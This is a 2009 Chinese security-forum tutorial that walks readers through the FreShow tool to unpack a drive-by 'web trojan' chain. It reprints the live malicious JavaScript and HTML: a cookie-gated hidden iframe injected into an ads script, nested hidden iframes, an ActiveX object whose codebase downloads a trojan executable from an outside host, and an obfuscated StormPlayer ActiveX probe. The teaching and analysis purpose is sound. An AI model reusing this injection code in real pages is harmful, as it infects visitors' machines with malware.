瑞星卡卡安全论坛技术交流区恶意网站交流 通过实例讲解freshow使用方法

1   1  /  1  页   跳转

通过实例讲解freshow使用方法

通过实例讲解freshow使用方法

大家肯定看了网马解密大讲堂——网马解密中级篇(Freshow工具使用方法)  可能有部分人不会

请误点击下面任何网址,点击后果自负

那好下面我通过实例给大家讲解一下 请大家下载好freshow工具 打开跟我一起做

1.请大家打开freshow 在"url"输入http://ln.vnet.cn/ads.js 然后check
如果你打不开就复制下面代码到复制到"上操作区"(就是URL下面空白处)

var cookieString=document.cookie;
var start=cookieString.indexOf("cookiesleep");
if(start!=-1){}else{var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="cookiesleep=test;expires="+expires.toGMTString();
document.write("<iframe src=http://brrtydwsw.cn/07/0007.htm?22 width=100 height=0 border=0></iframe>");}


2.然后按filter,然后看见收集区域(最右面)里面多了一个网址http://brrtydwsw.cn/07/0007.htm?22
3.点击那个http://brrtydwsw.cn/07/0007.htm?22后 发现URL显示那个网址了,继续check
下面就显示代码



引用:

<script>
if(self.location==top.location)
{
location.href='http://www.google.cn';
}
</script>
<script language="javascript">
var now = new Date();
var miao =  now.getSeconds(); 
document.write("<iframe width=100 height=0 src=new.html><\/iframe>");
document.write("<BR>");
document.write("<\/BR>");
document.write("<BR>");
document.write("<\/BR>");
if (miao>50&&miao<100)
{
document.writeln("<script type=\"text\/javascript\" src=\"http:\/\/js.t0ngji.cn.yahoo.com\/1103014\/ystat.js\"><\/script><noscript><a href=\"http:\/\/tongji.cn.yahoo.com\"><img src=\"http:\/\/img.tongji.cn.yahoo.com\/1103014\/ystat.gif\"\/><\/a><\/noscript>");
}
else
{
document.writeln("<script type=\"text\/javascript\" src=\"http:\/\/js.tongji.cn.yahoo.com\/1103014\/ystat.js\"><\/script><noscript><a href=\"http:\/\/tongji.cn.yahoo.com\"><img src=\"http:\/\/img.tongji.cn.yahoo.com\/1103014\/ystat.gif\"\/><\/a><\/noscript>");
}
</script>



用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; CIBA; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; MAXTHON 2.0)
本帖被评分 3 次
最后编辑幸福耗子 最后编辑于 2009-05-17 20:55:38
分享到:
gototop
 

回复: 通过实例讲解freshow方法

4.继续filter 右面收集区域又多了几个网址
5.点击http://brrtydwsw.cn/07/new.html 按check


引用:

<iframe src=ytqm.htm width=100 height=0></iframe>
<script src="js.js"></script>

6.继续fliter 点击http://brrtydwsw.cn/07/ytqm.htm 继续check


引用:

<html>
<head>
<meta http-equiv="Content-Type" c>
</head>
<body bgcolor="#FFFFFF" text="#000000">
<br>
<object classid="clsid:19EFFC12-25FB-479A-A0F2-1569AE1B3365" codebase="http://oiuhfww.cn/7.exe#version=1,0,0,002"  width="0" height="0">
</object>
</body>
</html>



在这里注意:http://oiuhfww.cn/7.exe 这个就是木马下载地址

把那个木马下载网址复制到右下方obj空白处 然后按insert 就ok了

好了  现在我把真正木马下载地址找到完毕后 就开始输出日志了

选中右面all前面的勾 然后按log钮


引用:


Log is generated by FreShow.
[wide]http://ln.vnet.cn/ads.js
    [frame]http://brrtydwsw.cn/07/0007.htm?22
        [frame]http://brrtydwsw.cn/07/new.html
            [frame]http://brrtydwsw.cn/07/ytqm.htm
                [object]http://oiuhfww.cn/7.exe
            [script]http://brrtydwsw.cn/07/js.js
        [script]http://brrtydwsw.cn/07/\"http:\/\/js.t0ngji.cn.yahoo.com\/1103014\/ystat.js\"
        [script]http://brrtydwsw.cn/07/\"http:\/\/js.tongji.cn.yahoo.com\/1103014\/ystat.js\"



再本贴下面回复中 粘贴一下 就看到日志了


出一道问题
那个挂马网址才解一半  你尝试继续解http://brrtydwsw.cn/07/js.js
可能考虑部分人打不开 源码在下面

if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<iframe width=100 height=0 src=yt14.htm></iframe>");
document.write("<iframe width=100 height=0 src=ytfl.htm></iframe>");
document.write("<iframe width=100 height=0 src=ytff.htm></iframe>");
document.write("<iframe width=100 height=0 src=ytvod.htm></iframe>");
if(navigator.userAgent.toLowerCase().indexOf("msie 7")>0)
document.write("<iframe src=ytxxz.htm width=100 height=0></iframe>");
try{var m;
var of=new ActiveXObject("MPS"+".S"+"to"+"rm"+"Pl"+"ay"+"er.1");}
catch(m){};                     
finally{if(m!="[object Error]"){document.write("<iframe width=100 height=0 src=ytbb.htm></iframe>");}}
document.write("<iframe width=100 height=0 src=yt122121.htm></iframe>");


他的木马下载地址是什么? 只要解出来一个就行 因为那里所有挂的都是一个木马下载地址

这个挂马方式没有采用任何加密  挂马网址清晰可见

答案在下面 回帖就能看见
***** 该内容需回复才可浏览 *****
本帖被评分 1 次
最后编辑幸福耗子 最后编辑于 2009-05-16 20:02:01
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT